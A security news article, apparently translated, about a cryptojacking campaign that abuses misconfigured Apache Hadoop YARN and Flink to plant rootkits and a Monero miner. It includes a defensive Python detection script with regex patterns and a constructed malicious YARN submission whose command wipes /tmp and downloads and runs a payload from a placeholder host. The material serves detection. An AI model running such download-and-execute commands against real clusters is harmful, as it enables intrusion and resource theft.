Hadoop and Flink become targets for cryptojacking: What vulnerabilities do attackers use to attack

Brother

Aqua Security reveals weaknesses in popular Apache products.

Cybersecurity researchers have discovered a new attack campaign that exploits misconfigurations in Apache's Hadoop and Flink software to deploy cryptocurrency miners on targeted systems.

"This attack is particularly interesting because of the attackers' use of packers and rootkits to hide the malware," note researchers from Aqua Security in their report published on January 8. The malware deletes the contents of certain directories and changes system configurations to evade detection.

The Apache Hadoop infection chain exploits a misconfiguration of the YARN (Yet Another Resource Negotiator) ResourceManager, the component responsible for tracking resources in the cluster and scheduling applications.

In particular, this flaw allows a remote, unauthenticated attacker to execute arbitrary code by means of a specially crafted HTTP request, with the impact depending on the privileges of the user account under which the code runs on that node.

Similar attacks on Apache Flink also target a misconfiguration that allows a remote attacker to execute code without any authentication.

These vulnerabilities are not new and have previously been exploited by groups motivated by financial gain, such as TeamTNT, which is known for attacking Docker and Kubernetes for cryptojacking and other malicious activities.

However, the latest attacks are notable for using rootkits to hide cryptocurrency mining processes after initially penetrating Hadoop and Flink applications.

First, the attacker sends an unauthenticated request to create a new application, and then sends a POST request to YARN asking it to launch this new application with a specific command.

The command clears the /tmp directory of all existing files, downloads a file called "dca" from a remote server and executes it, and then deletes all files in the /tmp directory again.

The executed file is a packed ELF binary that loads two rootkits and a Monero miner binary. To achieve persistence, a cron job is created that downloads and executes a shell script, which in turn deploys the "dca" binary.
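A defender-side check for the submission step described above, written as an added example that is not part of the original post or Aqua's report: it inspects a captured YARN submit-application body (the `am-container-spec.commands.command` field of a POST to `/ws/v1/cluster/apps`) for the wipe-download-execute-wipe pattern. The sample submissions and the payload host name are constructed placeholders.

```python
import json
import re

# Patterns for the launch command described in the post: wipe /tmp, fetch a
# payload with curl/wget, make it executable, run it from /tmp, wipe again.
INDICATORS = {
    "wipes_tmp": re.compile(r"\brm\s+-rf\s+/tmp(/\*?)?(\s|;|$)"),
    "downloads_payload": re.compile(r"\b(curl|wget)\b[^;&|]*https?://"),
    "runs_from_tmp": re.compile(r"chmod\s+\+?x\s+/tmp/|(^|[;&|])\s*/tmp/\S+"),
}

# "dr.who" is the identity Hadoop assigns to HTTP callers when no
# authentication filter is configured (hadoop.http.staticuser.user default),
# so it is the submitter name an unauthenticated request shows up under.
ANONYMOUS_USER = "dr.who"


def analyze_submission(body: str, submitter: str = "") -> dict:
    """Score one YARN submit-application body (POST /ws/v1/cluster/apps).

    The launch command is read from am-container-spec.commands.command, the
    field the YARN REST API uses for the ApplicationMaster command line.
    """
    app = json.loads(body)
    cmd = app.get("am-container-spec", {}).get("commands", {}).get("command", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if submitter == ANONYMOUS_USER:
        hits.append("anonymous_submitter")
    return {"application-id": app.get("application-id"),
            "hits": hits, "suspicious": len(hits) >= 2}


# Constructed sample submissions; the host name is a placeholder, not an IoC.
BENIGN_SUBMISSION = json.dumps({
    "application-id": "application_1700000000000_0001",
    "application-name": "wordcount",
    "am-container-spec": {"commands": {
        "command": "{{JAVA_HOME}}/bin/java -jar wordcount.jar input output"}},
})
MALICIOUS_SUBMISSION = json.dumps({
    "application-id": "application_1700000000000_0002",
    "application-name": "new-application",
    "am-container-spec": {"commands": {
        "command": "rm -rf /tmp/*; curl -o /tmp/dca http://payload-host.example/dca;"
                   " chmod +x /tmp/dca; /tmp/dca; rm -rf /tmp/*"}},
})

if __name__ == "__main__":
    for body in (BENIGN_SUBMISSION, MALICIOUS_SUBMISSION):
        print(analyze_submission(body, submitter=ANONYMOUS_USER))
```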

Analysis of the attacker's infrastructure shows that the server for downloading the payload was registered on October 31, 2023.

As a risk mitigation measure, organizations are encouraged to deploy agent-based security solutions capable of detecting cryptominers, rootkits, obfuscated or packed binaries, and other suspicious activity.